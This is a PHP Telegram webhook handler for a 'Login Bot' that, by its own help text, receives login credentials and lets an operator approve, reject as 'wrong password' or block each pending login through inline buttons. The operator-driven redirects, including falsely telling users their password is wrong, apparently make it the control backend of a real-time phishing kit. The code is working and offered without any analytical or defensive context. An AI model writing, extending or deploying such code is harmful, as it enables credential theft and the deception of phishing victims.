<?php
require_once __DIR__ . '/../config.php';

header('Content-Type: application/json');

// Get POST data from Telegram
$content = file_get_contents('php://input');
$update = json_decode($content, true);

if (!$update) {
    http_response_code(200);
    echo json_encode(['ok' => false, 'error' => 'Invalid JSON']);
    exit;
}

// Handle callback query (button click)
if (isset($update['callback_query'])) {
    $callbackQuery = $update['callback_query'];
    $callbackQueryId = $callbackQuery['id'];
    $data = $callbackQuery['data'] ?? '';
    $chatId = $callbackQuery['message']['chat']['id'] ?? null;
    
    // Parse callback data: login_continue_{loginId}, login_wrong_{loginId}, login_block_{loginId}
    if (preg_match('/^login_(continue|wrong|block)_(.+)$/', $data, $matches)) {
        $action = $matches[1];
        $loginId = $matches[2];
        
        $login = getPendingLogin($loginId);
        
        if ($login) {
            $status = null;
            $redirectUrl = REDIRECT_URL;
            $alertText = '';
            
            switch ($action) {
                case 'continue':
                    $status = 'approved';
                    $alertText = '✅ Access approved';
                    break;
                    
                case 'wrong':
                    $status = 'wrong_password';
                    $redirectUrl = '?step=password&error=wrong_password';
                    $alertText = '❌ Wrong password - User will be redirected to login';
                    break;
                    
                case 'block':
                    $status = 'blocked';
                    $redirectUrl = '?step=password&error=blocked';
                    $alertText = '🚫 Access blocked';
                    break;
            }
            
            if ($status !== null) {
                updatePendingLoginStatus($loginId, $status, $redirectUrl);
                
                // Answer callback query
                answerTelegramCallback($callbackQueryId, $alertText);
                
                // Update message with status
                $botToken = TELEGRAM_BOT_TOKEN;
                $messageId = $callbackQuery['message']['message_id'] ?? null;
                
                if ($messageId && $chatId) {
                    $url = "https://api.telegram.org/bot{$botToken}/editMessageText";
                    $originalText = $callbackQuery['message']['text'] ?? '';
                    $statusEmoji = $action === 'continue' ? '✅' : ($action === 'wrong' ? '❌' : '🚫');
                    $newText = $originalText . "\n\n{$statusEmoji} Status: " . ucfirst(str_replace('_', ' ', $status));
                    
                    $ch = curl_init();
                    curl_setopt_array($ch, [
                        CURLOPT_URL => $url,
                        CURLOPT_POST => true,
                        CURLOPT_POSTFIELDS => json_encode([
                            'chat_id' => $chatId,
                            'message_id' => $messageId,
                            'text' => $newText,
                            'reply_markup' => ['inline_keyboard' => []]
                        ]),
                        CURLOPT_HTTPHEADER => ['Content-Type: application/json'],
                        CURLOPT_RETURNTRANSFER => true,
                        CURLOPT_TIMEOUT => 10
                    ]);
                    curl_exec($ch);
                    curl_close($ch);
                }
                
                http_response_code(200);
                echo json_encode(['ok' => true, 'status' => $status]);
                exit;
            }
        } else {
            answerTelegramCallback($callbackQueryId, '⚠️ Login session not found');
        }
    }
    
    // Answer callback query even if not handled
    answerTelegramCallback($callbackQueryId);
}

// Handle regular messages (optional - for testing)
if (isset($update['message'])) {
    $message = $update['message'];
    $text = $message['text'] ?? '';
    $chatId = $message['chat']['id'] ?? null;
    
    if ($text === '/start' || $text === '/help') {
        $botToken = TELEGRAM_BOT_TOKEN;
        $url = "https://api.telegram.org/bot{$botToken}/sendMessage";
        $helpText = "🤖 Login Bot\n\nThis bot receives login credentials and allows you to control access.\n\nUse the inline buttons to approve, reject, or block login attempts.";
        
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => json_encode([
                'chat_id' => $chatId,
                'text' => $helpText
            ]),
            CURLOPT_HTTPHEADER => ['Content-Type: application/json'],
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => 10
        ]);
        curl_exec($ch);
        curl_close($ch);
    }
}

http_response_code(200);
echo json_encode(['ok' => true]);
exit;
